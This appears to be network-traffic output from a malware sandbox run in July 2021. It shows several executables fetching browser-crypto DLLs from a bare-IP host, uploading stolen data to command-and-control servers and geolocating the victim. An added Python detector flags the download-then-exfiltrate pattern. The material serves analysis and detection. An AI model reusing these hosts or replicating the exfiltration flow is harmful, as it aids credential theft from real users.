Process: VpYfqWTsvrvmk4DESisFXHov.exe
Remote address: 157.90.127.76:80
Request
GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 157.90.127.76
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:16:43 GMT
Content-Type: application/x-msdos-program
Content-Length: 440120
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "6b738-57aa1f0b0df80"
Expires: Sat, 03 Jul 2021 07:16:43 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes

GET http://157.90.127.76/nss3.dll
Process: VpYfqWTsvrvmk4DESisFXHov.exe
Remote address: 157.90.127.76:80
Request
GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 157.90.127.76
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:16:46 GMT
Content-Type: application/x-msdos-program
Content-Length: 1246160
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "1303d0-57aa1f0b0df80"
Expires: Sat, 03 Jul 2021 07:16:46 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes

GET http://157.90.127.76/softokn3.dll
Process: VpYfqWTsvrvmk4DESisFXHov.exe
Remote address: 157.90.127.76:80
Request
GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 157.90.127.76
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:16:58 GMT
Content-Type: application/x-msdos-program
Content-Length: 144848
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "235d0-57aa1f0b0df80"
Expires: Sat, 03 Jul 2021 07:16:58 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes

GET http://157.90.127.76/vcruntime140.dll
Process: VpYfqWTsvrvmk4DESisFXHov.exe
Remote address: 157.90.127.76:80
Request
GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: 157.90.127.76
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:17:00 GMT
Content-Type: application/x-msdos-program
Content-Length: 83784
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "14748-57aa1f0b0df80"
Expires: Sat, 03 Jul 2021 07:17:00 GMT
Cache-Control: max-age=86400
X-Cache-Status: EXPIRED
X-Cache-Status: HIT
Accept-Ranges: bytes

POST http://157.90.127.76/
Process: VpYfqWTsvrvmk4DESisFXHov.exe
Remote address: 157.90.127.76:80
Request
POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 50102
Host: 157.90.127.76
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:17:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
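The five transactions above form one recognisable sequence: a single process pulls msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll (the NSS libraries and VC runtime a stealer needs to read browser credential stores) from a bare-IP host, then, 18 seconds after the last download, POSTs 50102 bytes of multipart/form-data to the same host. The Python below is an added example, not part of this tria.ge report or of any tool it names; it replays constructed records that mirror the entries above (same process name, host, paths, content lengths; request headers abridged) and flags that download-then-exfiltrate pattern. Assumptions, labelled in the code: the two extra DLL names (freebl3.dll, mozglue.dll) come from the family's usual set and do not appear on this page, the chrome.exe control record is hypothetical, and the two-DLL threshold is a tuning choice.

```python
"""Flag the DLL-download-then-multipart-POST sequence recorded above.
Added example: records are constructed to mirror this page's entries."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlparse

# Support libraries that Vidar/Arkei-style stealers fetch from their C2 before
# reading browser credential stores. freebl3.dll and mozglue.dll are not on
# this page; including them is an assumption from the family's usual set.
STEALER_SUPPORT_DLLS = {"freebl3.dll", "mozglue.dll", "msvcp140.dll",
                        "nss3.dll", "softokn3.dll", "vcruntime140.dll"}

# Request headers shared by every transaction above (abridged from the log).
COMMON_REQ_HDRS = ("Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\n"
                   "Host: 157.90.127.76\nConnection: Keep-Alive\n")
PROC = "VpYfqWTsvrvmk4DESisFXHov.exe"


def _dll_get(path, length):
    """One DLL download record shaped like the report's entries."""
    return {"process": PROC, "method": "GET", "url": f"http://157.90.127.76{path}",
            "request": f"GET {path} HTTP/1.1\n" + COMMON_REQ_HDRS,
            "response": ("HTTP/1.1 200 OK\nServer: nginx\n"
                         "Content-Type: application/x-msdos-program\n"
                         f"Content-Length: {length}\n"
                         "X-Cache-Status: EXPIRED\nX-Cache-Status: HIT\n")}


# Constructed sample log: the four downloads and the POST from this page, plus
# one benign control (a browser connectivity probe; hypothetical record).
SAMPLE_LOG = [
    _dll_get("/msvcp140.dll", 440120),
    _dll_get("/nss3.dll", 1246160),
    _dll_get("/softokn3.dll", 144848),
    _dll_get("/vcruntime140.dll", 83784),
    {"process": PROC, "method": "POST", "url": "http://157.90.127.76/",
     "request": ("POST / HTTP/1.1\n" + COMMON_REQ_HDRS
                 + "Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\n"
                 + "Content-Length: 50102\nCache-Control: no-cache\n"),
     "response": ("HTTP/1.1 200 OK\nServer: nginx\nContent-Type: text/html; charset=UTF-8\n"
                  "Transfer-Encoding: chunked\nContent-Encoding: gzip\n")},
    {"process": "chrome.exe", "method": "GET",
     "url": "http://www.msftconnecttest.com/connecttest.txt",
     "request": "GET /connecttest.txt HTTP/1.1\nHost: www.msftconnecttest.com\n",
     "response": "HTTP/1.1 200 OK\nContent-Type: text/plain\n"},
]


def parse_http_headers(raw):
    """Return (start line, {lower-cased name: [values]}). Repeated headers such
    as the two X-Cache-Status values are kept in order rather than collapsed."""
    lines = raw.strip().splitlines()
    headers = defaultdict(list)
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()].append(value.strip())
    return lines[0], dict(headers)


def _is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def detect_stealer_sequence(log, min_dlls=2):
    """Per (process, host): flag a process that fetched >= min_dlls support DLLs
    from a raw-IP host and afterwards POSTed multipart/form-data to that host.
    Order matters: a POST seen before any DLL download is not counted."""
    state = defaultdict(lambda: {"dlls": [], "exfil_bytes": []})
    for rec in log:
        url = urlparse(rec["url"])
        key = (rec["process"], url.hostname or "")
        _, req_h = parse_http_headers(rec["request"])
        _, resp_h = parse_http_headers(rec["response"])
        filename = url.path.rsplit("/", 1)[-1].lower()
        if rec["method"] == "GET" and filename in STEALER_SUPPORT_DLLS:
            ctype = resp_h.get("content-type", [""])[0]
            if "msdos-program" in ctype or "octet-stream" in ctype:
                state[key]["dlls"].append(filename)
        elif rec["method"] == "POST" and state[key]["dlls"]:
            ctype = req_h.get("content-type", [""])[0]
            if ctype.startswith("multipart/form-data"):
                state[key]["exfil_bytes"].append(int(req_h.get("content-length", ["0"])[0]))
    return [{"process": p, "host": h, "dlls": s["dlls"], "exfil_bytes": s["exfil_bytes"]}
            for (p, h), s in state.items()
            if _is_raw_ip(h) and len(set(s["dlls"])) >= min_dlls and s["exfil_bytes"]]


if __name__ == "__main__":
    for hit in detect_stealer_sequence(SAMPLE_LOG):
        print(f"{hit['process']} -> {hit['host']}: loaded {hit['dlls']}, "
              f"then POSTed {sum(hit['exfil_bytes'])} bytes as multipart/form-data")
```

Run against the sample log this reports the one VpYfqWTsvrvmk4DESisFXHov.exe -> 157.90.127.76 sequence and nothing for chrome.exe. Three conditions keep the rule narrow: the host is a raw IP rather than a name, at least two of the support DLLs arrive before the POST, and the POST is multipart/form-data to the same host. To apply it to real traffic, feed it proxy or Zeek http.log records joined with the originating process from EDR; a legitimate installer can fetch vcruntime140.dll, but it does not then upload an archive to the same bare IP a few seconds later.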

DNS www.msftconnecttest.com
Process: chrome.exe
Remote address: 8.8.8.8:53
Request
www.msftconnecttest.com IN A
Response
www.msftconnecttest.com IN CNAME v4ncsi.msedge.net
v4ncsi.msedge.net IN CNAME ncsi.4-c-0003.c-msedge.net
ncsi.4-c-0003.c-msedge.net IN CNAME 4-c-0003.c-msedge.net
4-c-0003.c-msedge.net IN A 13.107.4.52
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        nagano-19599.herokussl.com
                                                                                                                                                                                        nagano-19599.herokussl.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.21.224.49
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.21.136.132
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.19.92.227
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.16.226.23
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.235.88.121
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.225.78.40
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.16.220.248
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.235.175.90
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ipify.org/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        23.21.224.49:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: Cowboy
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:44 GMT
                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                        Via: 1.1 vegur
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 4722
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:16:46 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 1871649
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 150
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:17:13 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 1871635
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 261
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:17:26 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        5.44.45.141
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://enatuykebe.xyz/
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        5.44.45.141:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: enatuykebe.xyz
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:47 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://enatuykebe.xyz/
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        5.44.45.141:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: enatuykebe.xyz
                                                                                                                                                                                        Content-Length: 2147433
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        45.139.184.124
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:46 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 5544
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 294028
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 150
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 294014
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:02 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 261
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:48 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 296
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 57
                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdc36000039bfcb9c9000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GSRvvzl8ODYZ1N1cY3yyjjpRRZQhElpkFRcY36VxAuNRY6vM3tR%2FpyUfxyM6D6OMP18bgBmA2YsCE1bhaWgMNsWsFc7ICUC4xir3XCwBHdi164MmdvE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617405e9c39bf-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://101.36.107.74/seemorebty/il.php?e=md8_8eus
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        101.36.107.74:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /seemorebty/il.php?e=md8_8eus HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                                         Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                         Referer: https://www.facebook.com
                                                                                                                                                                                         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
                                                                                                                                                                                        Host: 101.36.107.74
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Server: Apache/2.4.37 (centos)
                                                                                                                                                                                        X-Powered-By: PHP/7.2.24
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdcd2000030ef33a17000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ljacdk%2FEK3Ap5cfyN4blqUg%2F2aiS3BZrb52AYDW0D37GD89%2Bs%2FVi20ZH6PSUg5RgoAQs5H8%2Fh9PjZ4USr%2FWS42Nf8lFA3IAp4OVfLldWYJFxdbGtzmw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617415a9e30ef-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
